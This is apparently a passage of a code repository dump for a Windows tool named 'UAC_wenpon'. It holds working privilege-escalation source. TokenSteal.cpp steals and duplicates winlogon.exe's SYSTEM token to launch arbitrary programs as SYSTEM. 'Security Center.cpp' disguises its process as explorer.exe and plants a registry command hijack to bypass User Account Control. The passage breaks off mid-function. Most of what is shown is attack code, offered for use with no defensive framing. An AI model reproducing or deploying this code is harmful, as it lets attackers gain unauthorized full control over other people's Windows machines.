<< L"%"; 168 | SetConsoleTextAttribute(hStdOutput, 14); 169 | std::wcout << L"] "; 170 | SetConsoleTextAttribute(hStdOutput, 14); 171 | std::wcout << L"*** Exploit successful.\n\n"; 172 | SetConsoleTextAttribute(hStdOutput, 7); 173 | 174 | return 0; 175 | } 176 | -------------------------------------------------------------------------------- /TokenSteal.cpp: -------------------------------------------------------------------------------- 1 | #include "TokenSteal.h" 2 | 3 | #pragma comment(lib,"Advapi32.lib") 4 | 5 | namespace RAII 6 | { 7 | Handle::Handle(HANDLE inputHandle) 8 | { 9 | _internalHandle = inputHandle; 10 | } 11 | 12 | Handle::~Handle() 13 | { 14 | ::CloseHandle(_internalHandle); 15 | } 16 | 17 | HANDLE Handle::GetHandle() 18 | { 19 | return _internalHandle; 20 | } 21 | } 22 | 23 | namespace RAII 24 | { 25 | Hmodule::Hmodule(HMODULE inputHmodule) 26 | { 27 | _internalHmodule = inputHmodule; 28 | } 29 | 30 | Hmodule::~Hmodule() 31 | { 32 | ::FreeLibrary(_internalHmodule); 33 | } 34 | 35 | HMODULE Hmodule::GetHmodule() 36 | { 37 | return _internalHmodule; 38 | } 39 | } 40 | 41 | void Error(_In_ DWORD lastError) 42 | { 43 | wchar_t buf[256]; 44 | FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 45 | NULL, lastError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 46 | buf, (sizeof(buf) / sizeof(wchar_t)), NULL); 47 | 48 | std::wcout << "[-] Error code: 0x" << std::hex << lastError << L". Error string: " << buf; 49 | } 50 | 51 | DWORD FindPid(_In_ std::wstring imageName) 52 | { 53 | 54 | // create snapshot of processes using RAII classes 55 | RAII::Handle snapshot( 56 | CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL) 57 | ); 58 | 59 | if (!snapshot.GetHandle()) 60 | { 61 | Error(::GetLastError()); 62 | return ERROR_FILE_NOT_FOUND; 63 | } 64 | 65 | PROCESSENTRY32W processEntry; 66 | processEntry.dwSize = sizeof(PROCESSENTRY32W); 67 | auto status = Process32FirstW(snapshot.GetHandle(), &processEntry); // start enumerating from the first process 68 | if (!status) 69 | { 70 | Error(::GetLastError()); 71 | return ERROR_FILE_NOT_FOUND; 72 | } 73 | 74 | do 75 | { 76 | std::wstring processImage = processEntry.szExeFile; 77 | std::transform(processImage.begin(), processImage.end(), processImage.begin(), towlower); 78 | if (processImage == imageName) 79 | { 80 | std::wcout << L"[+] Found process " << processEntry.szExeFile << " with PID " << processEntry.th32ProcessID << std::endl; // when lsass is found return its PID to the caller 81 | return processEntry.th32ProcessID; 82 | } 83 | } while (Process32NextW(snapshot.GetHandle(), &processEntry)); 84 | 85 | return ERROR_FILE_NOT_FOUND; 86 | } 87 | 88 | BOOL SePrivTokenrivilege( 89 | HANDLE hToken, 90 | LPCTSTR lpszPrivilege, 91 | BOOL bEnablePrivilege 92 | ) 93 | { 94 | LUID luid; 95 | 96 | if (!LookupPrivilegeValue( 97 | NULL, 98 | lpszPrivilege, 99 | &luid)) 100 | { 101 | return FALSE; 102 | } 103 | 104 | TOKEN_PRIVILEGES PrivToken; 105 | PrivToken.PrivilegeCount = 1; 106 | PrivToken.Privileges[0].Luid = luid; 107 | if (bEnablePrivilege) 108 | PrivToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 109 | else 110 | PrivToken.Privileges[0].Attributes = 0; 111 | 112 | 113 | if (!AdjustTokenPrivileges( 114 | hToken, 115 | FALSE, 116 | &PrivToken, 117 | sizeof(TOKEN_PRIVILEGES), 118 | (PTOKEN_PRIVILEGES)NULL, 119 | (PDWORD)NULL)) 120 | { 121 | return FALSE; 122 | } 123 | 124 | return TRUE; 125 | } 126 | 127 | int TokenSteal(char* arg, char* arg2) 128 | { 129 | char* secret = arg; 130 | char* secret2 = arg2; 131 | 132 | HANDLE hCurrentToken = NULL; 133 | BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrentToken); 134 | SePrivTokenrivilege(hCurrentToken, L"SeDebugPrivilege", TRUE); 135 | 136 | // open a handle to winlogon.exe (assign the HANDLE to a RAII type - defined in raii.h - so that CloseHandle is always called) 137 | RAII::Handle winlogonHandle(::OpenProcess(PROCESS_ALL_ACCESS, false, FindPid(L"winlogon.exe"))); 138 | if (winlogonHandle.GetHandle() == NULL) 139 | { 140 | std::cout << "[-] Could not get a handle to winlogon.exe" << std::endl; 141 | Error(::GetLastError()); 142 | return 1; 143 | } 144 | else std::cout << "[+] Opened handle to winlogon.exe: 0x" << winlogonHandle.GetHandle() << std::endl; 145 | 146 | // open a handle to winlogon's token 147 | HANDLE systemToken; 148 | BOOL success = ::OpenProcessToken(winlogonHandle.GetHandle(), TOKEN_DUPLICATE, &systemToken); 149 | RAII::Handle hSystemToken(systemToken); // assigning the HANDLE obtained through OpenProcessToken() to a RAII type 150 | if (!success) 151 | { 152 | std::cout << "[-] Could not get SYSTEM token. " << std::endl; 153 | ::Error(::GetLastError()); 154 | return 1; 155 | } 156 | else std::cout << "[+] Stolen SYSTEM token!" << std::endl; 157 | 158 | // create a new token and duplicate winlogon's token inside it 159 | HANDLE newSystemToken = NULL; 160 | success = ::DuplicateTokenEx 161 | ( 162 | hSystemToken.GetHandle(), 163 | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, 164 | nullptr, 165 | SecurityImpersonation, 166 | TokenPrimary, 167 | &newSystemToken 168 | ); 169 | RAII::Handle hNewSystemToken(newSystemToken); 170 | if (!success) 171 | { 172 | std::cout << "[-] Failed to call DuplicateTokenEx() on the stolen token. " << std::endl; 173 | ::Error(::GetLastError()); 174 | return 1; 175 | } 176 | else std::cout << "[+] SYSTEM token successfully duplicated!" << std::endl; 177 | 178 | // spawn taskmgr.exe using the newly duplicated SYSTEM token 179 | STARTUPINFO si = { sizeof(si) }; // startup info structure, used to specify custom configurations for the process 180 | PROCESS_INFORMATION pi; // process information structure that will hold HANDLEs to the child process/thread 181 | 182 | bstr_t b(secret); 183 | wchar_t* x = b; 184 | bstr_t b2(secret2); 185 | wchar_t* x2 = b2; 186 | 187 | success = ::CreateProcessWithTokenW 188 | ( 189 | hNewSystemToken.GetHandle(), // get the handle to the duplicated SYSTEM token 190 | NULL, 191 | x, // executable name/path 192 | x2, // arguments to the executable (we don't have them) 193 | NULL, 194 | nullptr, 195 | nullptr, 196 | &si, 197 | &pi 198 | );/* 199 | 200 | success = ::CreateProcessAsUserA( 201 | hNewSystemToken.GetHandle(), 202 | (LPCSTR)L"cmd.exe", 203 | nullptr, 204 | NULL, 205 | NULL, 206 | NULL, 207 | NULL, 208 | NULL, 209 | NULL, 210 | (LPSTARTUPINFOA)&si, 211 | &pi 212 | );*/ 213 | /* 214 | success = ::CreateProcessAsUser(hNewSystemToken.GetHandle(), // user token 215 | (LPWSTR)"C:\\Users\\admin\\Desktop\\artifact.exe", // app name 216 | NULL, // command line 217 | 0, // process attributes 218 | 0, // thread attributes 219 | FALSE, // don't inherit handles 220 | DETACHED_PROCESS, // flags 221 | 0, // environment block 222 | 0, // current dir 223 | &si, // startup info 224 | &pi);*/ 225 | if (!success) 226 | { 227 | std::wcout << L"[-] Failed to spawn " << x << L" running as SYSTEM. " << std::endl; 228 | ::Error(::GetLastError()); 229 | return 1; 230 | } 231 | else std::wcout << L"[+] Spawned " << x << L" running as SYSTEM!" << std::endl; 232 | 233 | // close the HANDLEs obtained with CreateProcessWithTokenW() which were not assigned to a RAII type variable 234 | ::CloseHandle(pi.hProcess); 235 | ::CloseHandle(pi.hThread); 236 | 237 | return 0; 238 | } -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /UAC_wenpon.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {98546e43-50e2-400b-b7dc-215205d045e7} 25 | UACwenpon 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | MultiThreaded 106 | 107 | 108 | Console 109 | true 110 | true 111 | false 112 | 113 | 114 | 115 | 116 | TurnOffAllWarnings 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | false 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | MultiThreaded 135 | 136 | 137 | Console 138 | true 139 | true 140 | true 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | -------------------------------------------------------------------------------- /Security Center.cpp: -------------------------------------------------------------------------------- 1 | #include "Security Center.h" 2 | 3 | 4 | 5 | #pragma region NT Stuff 6 | typedef struct _UNICODE_STRING 7 | { 8 | unsigned short Length; 9 | unsigned short MaximumLength; 10 | long Padding_8; 11 | wchar_t* Buffer; 12 | } UNICODE_STRING, * PUNICODE_STRING; 13 | 14 | typedef struct _CURDIR 15 | { 16 | struct _UNICODE_STRING DosPath; 17 | void* Handle; 18 | } CURDIR, * PCURDIR; 19 | 20 | typedef struct _STRING 21 | { 22 | unsigned short Length; 23 | unsigned short MaximumLength; 24 | long Padding_94; 25 | char* Buffer; 26 | } STRING, * PSTRING; 27 | 28 | typedef struct _RTL_DRIVE_LETTER_CURDIR 29 | { 30 | unsigned short Flags; 31 | unsigned short Length; 32 | unsigned long TimeStamp; 33 | struct _STRING DosPath; 34 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 35 | 36 | typedef struct _RTL_USER_PROCESS_PARAMETERS 37 | { 38 | unsigned long MaximumLength; 39 | unsigned long Length; 40 | unsigned long Flags; 41 | unsigned long DebugFlags; 42 | void* ConsoleHandle; 43 | unsigned long ConsoleFlags; 44 | long Padding_95; 45 | void* StandardInput; 46 | void* StandardOutput; 47 | void* StandardError; 48 | struct _CURDIR CurrentDirectory; 49 | struct _UNICODE_STRING DllPath; 50 | struct _UNICODE_STRING ImagePathName; 51 | struct _UNICODE_STRING CommandLine; 52 | void* Environment; 53 | unsigned long StartingX; 54 | unsigned long StartingY; 55 | unsigned long CountX; 56 | unsigned long CountY; 57 | unsigned long CountCharsX; 58 | unsigned long CountCharsY; 59 | unsigned long FillAttribute; 60 | unsigned long WindowFlags; 61 | unsigned long ShowWindowFlags; 62 | long Padding_96; 63 | struct _UNICODE_STRING WindowTitle; 64 | struct _UNICODE_STRING DesktopInfo; 65 | struct _UNICODE_STRING ShellInfo; 66 | struct _UNICODE_STRING RuntimeData; 67 | struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; 68 | unsigned __int64 EnvironmentSize; 69 | unsigned __int64 EnvironmentVersion; 70 | void* PackageDependencyData; 71 | unsigned long ProcessGroupId; 72 | unsigned long LoaderThreads; 73 | struct _UNICODE_STRING RedirectionDllName; 74 | struct _UNICODE_STRING HeapPartitionName; 75 | unsigned __int64* DefaultThreadpoolCpuSetMasks; 76 | unsigned long DefaultThreadpoolCpuSetMaskCount; 77 | long __PADDING__[1]; 78 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 79 | 80 | constexpr auto PEB_OFFSET = 0x60ULL; 81 | constexpr auto PROCESS_PARAM_OFFSET = 0x20ULL; 82 | constexpr auto BASENAME_OFFSET = 0x58ULL; 83 | constexpr auto FULLNAME_OFFSET = 0x48ULL; 84 | constexpr auto DLL_BASE_OFFSET = 0x30ULL; 85 | constexpr auto OS_MAJOR_VERSION_OFFSET = 0x118ULL; 86 | constexpr auto OS_MINOR_VERSION_OFFSET = 0x11CULL; 87 | #pragma endregion 88 | 89 | using RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR); 90 | using LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN); 91 | using LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID); 92 | 93 | using UserAssocSetPtr = void(WINAPI*)(int unknown0, PCWCHAR fileType, PCWCHAR progId); 94 | using UserAssocSetInternalPtr = HRESULT(WINAPI*)(void* unused0, PCWCHAR fileType, PCWCHAR progId, int unknown0); 95 | 96 | struct LDR_CALLBACK_PARAMS 97 | { 98 | PCWCHAR ExplorerPath; 99 | PVOID ImageBase; 100 | RtlInitUnicodeStringPtr RtlInitUnicodeString; 101 | }; 102 | 103 | struct IWscAdmin : IUnknown 104 | { 105 | virtual HRESULT Initialize( 106 | ) = 0; 107 | 108 | virtual HRESULT DoModalSecurityAction( 109 | HWND parentWindow, 110 | UINT securityAction, 111 | LONG_PTR unused0 112 | ) = 0; 113 | }; 114 | 115 | const GUID IID_IWscAdmin = { 0x49ACAA99, 0xF009, 0x4524, {0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 0x60} }; 116 | 117 | const BYTE SIGNATURE_NT10[] = { 118 | 0x48, 0x8B, 0xC4, 0x55, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA1, 0x48, 0x81, 0xEC, 0xA0, 119 | 0x00, 0x00, 0x00, 0x48, 0xC7, 0x45, 0xEF, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x20 120 | }; 121 | 122 | const BYTE SIGNATURE_NT6X[] = { 123 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0xFE, 0xFF, 124 | 0xFF, 0x48, 0x81, 0xEC, 0x80, 0x02, 0x00, 0x00 125 | }; 126 | 127 | void ForgeProcessInformation_sc(PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString, 128 | const LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules) 129 | { 130 | auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET); 131 | auto* pProcessParams = *reinterpret_cast(pPeb + PROCESS_PARAM_OFFSET); 132 | 133 | RtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath); 134 | RtlInitUnicodeString(&pProcessParams->CommandLine, L"explorer.exe"); 135 | 136 | LDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString }; 137 | 138 | LdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop) 139 | { 140 | auto* params = static_cast(context); 141 | 142 | if (*reinterpret_cast(reinterpret_cast(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast< 143 | ULONG_PTR>(params->ImageBase)) 144 | { 145 | const auto baseName = reinterpret_cast(static_cast(ldrEntry) + BASENAME_OFFSET), 146 | fullName = reinterpret_cast(static_cast(ldrEntry) + FULLNAME_OFFSET); 147 | 148 | params->RtlInitUnicodeString(baseName, L"explorer.exe"); 149 | params->RtlInitUnicodeString(fullName, params->ExplorerPath); 150 | 151 | *stop = TRUE; 152 | } 153 | }, reinterpret_cast(¶ms)); 154 | } 155 | 156 | template 157 | T LocateSignature(const BYTE signature[], const int signatureSize, const char* sectionName, const HMODULE moduleHandle) 158 | { 159 | auto* headers = reinterpret_cast(reinterpret_cast(moduleHandle) + reinterpret_cast< 160 | PIMAGE_DOS_HEADER>(moduleHandle)->e_lfanew); 161 | auto* sectionHeader = IMAGE_FIRST_SECTION(headers); 162 | 163 | while (std::strcmp(sectionName, reinterpret_cast(sectionHeader->Name))) 164 | sectionHeader++; 165 | 166 | for (auto* i = reinterpret_cast(moduleHandle) + sectionHeader->PointerToRawData; i != reinterpret_cast< 167 | PUCHAR>(moduleHandle) + sectionHeader->PointerToRawData + sectionHeader->SizeOfRawData - signatureSize; i++ 168 | ) 169 | { 170 | if (std::memcmp(signature, i, signatureSize) == 0) 171 | return reinterpret_cast(i); 172 | } 173 | 174 | return reinterpret_cast(nullptr); 175 | } 176 | 177 | int Security_Center(char* arg) 178 | { 179 | char* secret = arg; 180 | //char* secret = argv[1]; 181 | //char* secret = (char*)"notepad.exe"; 182 | auto* hConsole = GetStdHandle(STD_OUTPUT_HANDLE); 183 | 184 | 185 | 186 | auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET); 187 | const auto osMajorVersion = *reinterpret_cast(pPeb + OS_MAJOR_VERSION_OFFSET); 188 | const auto osMinorVersion = *reinterpret_cast(pPeb + OS_MINOR_VERSION_OFFSET); 189 | 190 | if (osMajorVersion <= 6 && osMinorVersion < 1) 191 | { 192 | std::wcout << L"OS not supported.\n"; 193 | return EXIT_FAILURE; 194 | } 195 | 196 | PWSTR windowsPath, systemPath; 197 | auto hr = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &windowsPath); 198 | if (FAILED(hr)) 199 | { 200 | std::wcout << L"SHGetKnownFolderPath() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl; 201 | return EXIT_FAILURE; 202 | } 203 | hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath); 204 | if (FAILED(hr)) 205 | { 206 | CoTaskMemFree(windowsPath); 207 | std::wcout << L"SHGetKnownFolderPath() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl; 208 | return EXIT_FAILURE; 209 | } 210 | 211 | //std::wstring explorer{windowsPath}, system32{systemPath}; 212 | std::wstring explorer{ windowsPath }; 213 | CoTaskMemFree(windowsPath); 214 | CoTaskMemFree(systemPath); 215 | explorer += L"\\explorer.exe"; 216 | 217 | const auto RtlInitUnicodeString = reinterpret_cast(GetProcAddress( 218 | GetModuleHandleW(L"ntdll.dll"), "RtlInitUnicodeString")); 219 | const auto LdrEnumerateLoadedModules = reinterpret_cast(GetProcAddress( 220 | GetModuleHandleW(L"ntdll.dll"), "LdrEnumerateLoadedModules")); 221 | 222 | ForgeProcessInformation_sc(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules); 223 | 224 | hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY); 225 | if (FAILED(hr)) 226 | { 227 | std::wcout << L"CoInitializeEx() failed. HRESULT: 0x" << std::hex << hr << std::endl; 228 | return EXIT_FAILURE; 229 | } 230 | 231 | HKEY key; 232 | auto status = RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing\\shell\\open\\command", 0, 233 | nullptr, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr, &key, nullptr); 234 | if (status) 235 | { 236 | CoUninitialize(); 237 | std::wcout << L"RegCreateKeyExW() failed. LSTATUS: " << status << std::endl; 238 | return EXIT_FAILURE; 239 | } 240 | //system32 += L"\\cmd.exe"; 241 | //status = RegSetValueExW(key, nullptr, 0, REG_SZ, reinterpret_cast(system32.c_str()),static_cast(system32.size() * sizeof WCHAR + sizeof(L'\0'))); 242 | //DWORD les = 108; 243 | bstr_t b(secret); 244 | WCHAR* x = b; 245 | status = RegSetValueExW(key, nullptr, 0, REG_SZ, (PBYTE)x, wcslen(x) * 2 + 2); 246 | 247 | RegCloseKey(key); 248 | if (status) 249 | { 250 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 251 | CoUninitialize(); 252 | std::wcout << L"RegSetValueExW() failed. LSTATUS: " << status << std::endl; 253 | return EXIT_FAILURE; 254 | } 255 | 256 | if (osMajorVersion == 10 && osMinorVersion == 0) 257 | { 258 | const auto hModule = LoadLibraryExW(L"SystemSettings.Handlers.dll", nullptr, 259 | 